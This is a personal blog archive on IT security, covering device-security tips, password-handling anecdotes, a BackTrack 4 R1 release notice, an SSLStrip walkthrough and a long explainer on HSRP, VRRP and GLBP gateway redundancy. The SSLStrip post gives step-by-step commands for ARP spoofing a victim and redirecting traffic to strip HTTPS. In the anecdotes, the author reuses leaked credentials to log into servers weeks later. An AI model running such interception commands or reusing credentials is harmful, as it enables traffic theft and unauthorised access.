Blog Archives

Security¿?

I was thinking today about security. In the way to work I use to read a book who is talking about it. My mind is becoming paranoid. I was working before in a remote site too far away of the crowded city but now the situation is different. I am in a big city.  When I´m going for work I see a lot of people with laptops, smartphones, tablets… and I only think in security.

Are all of those devices really secured? I´d like to think that at least, the professional people  a device 100% secured. When I say secured… at least have an antivirus and  password to unlock the device or password and some kind of encryption.

I believe that all other devices of teenagers and people who is not using the technology for work is not so protected. I saw some people unlocking the screen with a code number (that is good) and also with a figure code that is not so good(basically is because if you see the telephone against the light you would see the figure).

With a simple test, you could figure out how many devices are running with a open window when I say that I´m refering with bluetooth or wireless active. I know that for most of them, it is better having conections active because they can save 5 seconds in activate(aaahhhhh!!!).

I´m remembering my ages as administrator:

Me: – (looking out of the keyboard), please type your password.

User: – I wrote my user and pass for you in a peace of paper. I´m going to  put some order here in the office.

Me: …..LOL!

Back to handy devices, there are many kind of attacks for smartphones that could be used with bad intentions. There are tons of stupid apps that people is downloading and they don´t update . This kind of apps are a good start to exploit.

Just some security advices:

  1. Put a password in your device(laptop, tablet, smartphone) to unlock. You could forget it in a public place and anyone could sniff in your personal data.
  2. Don´t save passwords. If someone get access to your device he could spend some time in ebay with your accout.
  3. If you have your passwords there, use a software to encrypt the password database.
  4. Don´t use weak passwords like…. “123456”

When you go to the bank machine, you use to hide the keyboard to avoid watchers. In same way, when you unlock your device, or you see an email try to do the same.

A good idea is using polarised covers.

:))

Security? No, please!

In the last couple of months I have been working in different scenariosI notice that people is not taking care of some basic security aspects. 

For example:

  • We were working in a network issue. An engineer was requested to check a server log. After a few seconds this person wrote in a multichat conversation: “C0n$0le7” :S . To hide this big mistake, he wrote down “fjkfslfadslfjsljf”. Because I¨m just curious,  I decided to check from my computer the access to this server. Was not so difficult to gain access. I did an appointment to try the day after and this guy did not change the password and 1 week later password is still the same!!!!!
 
 
 
  • Another example. 01:00 am, another network incident. I was on-call and this is the situation:

PersonA: “We have problem in this device, could you please help us?”.

Me: ” We are not supporting this device could you please call the people in charge?”

PersonA: “Could you please help us anyway….?”

Me: “I don´t have rights to access this device”

PersonA: ” I already sent to you an email with root account”

Me: :S

PersonA: Please.

Me: Let me try…. 

      ……….

      After some checkings…. done!

PersonA: Thank you. 

Me: No problem

I did an appointment to check this password some weeks later and….. babum!! it works!!

 
  • Scenario 3. During another issue in which I was trying to explain to the ingeneer in charge of a server how to configure the server…. (yes it is true!!) I requested to him a user and password to do some test with a test user. This guy told me: ” Use mine, but please don´t share with anyone”. This was 6 months ago and still today I can access this server!!!!!

 

 

Back Track 4 R1

New BackTrack 4 revision 1 is available to download.

New in this version:

* New Kernel 2.6.34 to improve hardware compatibility and performance.
* Update all tools
* New tool called “dragon” who can allow the user modify BackTrack options from CML
* Add the option to change KDE environment by Fluxbox offering a faster and flowed environment.
* Implementing driver rt28xx for Alpha AWUS050NH cards.
* If you download VMware version, VMware tools are integrated.

This is the final version of BackTrack 4 R1.
Please download it and test it!!!

Direct Downloads:

ISO Version

http://www.backtrack-linux.org/download.php?fname=bt4r1

VMware version

http://www.backtrack-linux.org/download.php?fname=bt4r1vm

Torrent Downloads:

ISO Version

http://www.offensive-security.com/bt4-r1.iso.torrent

VMware version

http://www.offensive-security.com/bt4-r1-vm.tar.bz2.torrent

“Secure” Socket Layer (SSL)

Are you really sure that SSL connections are strong?. I mean, nobody can intercept your traffic, your passwords or even your bank account number. SSL is one of the world’s most important VPN encryption.

There is a tool (SSL strip) that the author claims to have used it to steal data from the most important and “safe” websites. This man is Moxie. A recognized security consultant.

Configuring SSL-Strip

1st – Configure IP forwarding

echo 1 > /proc/sys/net/ipv4/ip_forward

2nd – Perform a Main-in-the-middle ARP attack

arpspoof -i eth0 -t VICTIM

3rd – Redirect traffic through iptables

iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 8080

4th – Start SSLStrip in used port

python sslstrip.py -w archivo

Moxie’s website: http://www.thoughtcrime.org

High availability

I am a security passionate. First I would like to think about the concept.

What does it means “high availability”?

For example:

You are responsible of a small network and you have a spare server, router, switch and some computers. This can not be considered high availability because but is not efficient. High availability will be if you have two routers configured and in case that one is broken, all traffic will be router by the other one. The administrator should receive an alarm and this broken appliance should be replaced. This can be a “basic” scenario. It will be same for servers and switches.

Best scenario could be:

*Two different internet providers.

*A pair of good routers each one with redundant power and configured with HSRP, VRRP or GLBP protocols.

*A cluster server environment to prevent a failure in the system.

*All devices should be connected to a separate power line.

*A SAI should protect the core of the company.

If finally all the above can be duplicated  in another office…. means that the information that you are handling is toooooo important 😉

I do not know if I have skipped an y concept.

This is the theory but it depends on the necessity of the company. If the company can assume an hour or a day loss service, then is not necessary all this kind of measures. However, if the company sells articles in a website each minute is important because the service is not good for the customer.

There are another extreme cases.I read a whitepapper in which the author were talking about the systems used by the military forces in aircrafts. The systems used to control this jets is best redundant example. It uses 3 different systems with 3 different architectures and 3 different operating systems. He did not talk about power but I think that is redundant too 😉

Now let’s start to talk about redundant protocols.

Hot Standby Router Protocol (HSRP). Provides default gateway redundancy using one active and one standby router. That means. A router is receiving all weight and in case of it fails, the standby router will become as active router. When the the service is established it will back to standby router as before. By multicasting packets, HSRP sends its hello messages to the multicast address 224.0.0.2 using UDP port 1985, to other HSRP-enabled routers, defining priority between the routers.The primary router with the highest configured priority will act as a virtual router with a pre-defined gateway IP and will respond to the ARP request from machines connected to the LAN with the mac address 0000.0c07.acXX where XX is the group ID in hex. If the primary router should fail, the router with the next-highest priority would take over the gateway IP and answer ARP requests with the same mac address, thus achieving transparent default gateway fail-over.

HSRP and VRRP are not routing protocols as they do not advertise IP routes or affect the routing table in any way.

HSRP and VRRP on some routers have the ability to trigger a failover if one or more interfaces on the router go down. This can be useful for dual branch routers each with a single serial link back to the head end. If the serial link of the primary router goes down, you would want the backup router to take over the primary functionality and thus retain connectivity to the head end.

Virtual Router Redundancy Protocol (VRRP). An open-standard alternative to Cisco’s HSRP, providing the same funcionality.designed to increase the availability of the default gateway servicing hosts on the same subnet. This increased reliability is achieved by advertising a “virtual router” (an abstract representation of master and backup routers acting as a group) as a default gateway to the host(s) instead of one physical router. Two or more physical routers are then configured to stand for the virtual router, with only one doing the actual routing at any given time. If the current physical router that is routing the data on behalf of the virtual router fails, an arrangement is made for another physical router to automatically replace it. The physical router that is currently forwarding data on behalf of the virtual router is called the master router. Physical routers standing by to take over from the master router in case something goes wrong are called backup routers.

A virtual router must use 00-00-5E-00-01-XX as its Media Access Control (MAC) address. The last byte of the address (XX) is the Virtual Router IDentifier (VRID), which is different for each virtual router in the network. This address is used by only one physical router at a time, and it will reply with this MAC address when an ARP request is sent for the virtual router’s IP address. Physical routers within the virtual router must communicate within themselves using packets with multicast IP address 224.0.0.18 and IP protocol number 112.

Routers have a priority of between 1-255 and the router with the highest priority will become the master. When a planned withdrawal of a master router is to take place, its priority can be lowered which means a backup router will pre-empt the master router status rather than having to wait for the hold time to expire. This reduces the black hole period.

Gateway Load Balancing Protocol (GLBP). Supports arbitrary load balancing in addition to redundancy across gateways. It is a Cisco proprietary protocol that attempts to overcome the limitations of existing redundant router protocols by adding basic load balancing functionality.

In addition to being able to set priorities on different gateway routers, GLBP also allows a weighting parameter to be set. Based on this weighting (compared to others in the same virtual router group), ARP requests will be answered with MAC addresses pointing to different routers. Thus, load balancing is not based on traffic load, but rather on the number of hosts that will use each gateway router. By default GLBP load balances in round-robin fashion.

GLBP elects one AVG (Active Virtual Gateway) for each group. Other group members act as backup in case of AVG failure. In case there are more than two members, second best AVG is placed in the Standby state and all other members are placed in the Listening state. This is monitored using hello and holdtime timers, which are 3 and 10 seconds by default. The elected AVG then assigns a virtual MAC address to each member of the GLBP group, including itself, thus enabling AVFs (Active Virtual Forwarders). Each AVF assumes responsibility for forwarding packets sent to its virtual MAC address. There could be up to four active AVFs at the same time.

By default, GLBP routers use the local multicast address 224.0.0.102 to send hello packets to their peers every 3 seconds over UDP 3222 (source and destination).